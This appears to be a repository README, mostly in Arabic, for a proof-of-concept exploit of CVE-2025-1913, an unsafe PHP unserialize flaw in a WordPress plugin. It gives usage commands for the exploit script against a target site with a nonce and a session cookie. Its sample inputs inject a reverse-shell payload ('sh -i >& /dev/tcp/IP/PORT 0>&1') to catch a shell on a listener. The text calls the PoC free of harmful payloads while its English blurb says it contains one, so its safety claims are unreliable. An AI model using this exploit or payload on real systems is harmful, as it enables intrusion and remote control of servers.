
A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research.
يحتوي هذا المستودع على إثبات مفهوم تعليمي فقط لـ CVE-2025-1913، من إنشاء Suhaib518 🇸🇦. يوضح إثبات المفهوم هذا كيف يمكن لمدخلات PHP المسلسلة المصممة خصيصًا أن تؤدي إلى تفعيل منطق قابل للاستغلال في مكونات ووردبريس المتأثرة. إثبات المفهوم آمن ولا يتضمن حمولات ضارة.
⚠️ إخلاء مسؤولية: إثبات المفهوم هذا مخصص للتعلم والبحث واختبار الأمان الدفاعي فقط. لا تستخدمه على خوادم لا تملكها أو ليس لديك إذن صريح لاختبارها.
الضعف موجود بسبب المعالجة غير الآمنة لبيانات PHP المسلسلة في سير عمل معينة لإضافات ووردبريس. يُظهر إثبات المفهوم هذا كيف يمكن لمهاجم تقديم هياكل مسلسلة مصممة تسبب سلوكًا داخليًا غير مقصود.
يتضمن هذا المستودع سكربت بايثون يقوم بما يلي:
.
├── CVE-2025-1913-PoC.py # سكربت إثبات المفهوم من إنشاء Suhaib518 المملكة العربية السعودية
└── README.md # التوثيق
يستخدم السكربت وحدات بايثون المضمنة فقط باستثناء requests:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
سيُطلب منك:
سيقوم السكربت بعد ذلك بتسلسلها، بناء طلب ووردبريس، وإرساله.
فيما يلي مثال أمر يوضح الاستخدام بقيم توضيحية (هذه ليست ضارة، بل تُظهر العملية فقط):
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
أمثلة لإجابات الأسئلة التفاعلية:
[?] كم خاصية تمتلك هذه الفئة؟ 2
[?] اسم الخاصية #1: file
[?] القيمة لـ 'file': shell.sh
[?] اسم الخاصية #2: shell
[?] القيمة لـ 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1
سيقوم السكربت بعد ذلك بطباعة:
[*] جاري إرسال الطلب…
....تحقق من المستمع للحصول على الشل.
unserialize() على مدخلات غير موثوقةرخصة MIT.
من إنشاء Suhaib518 🇸🇦.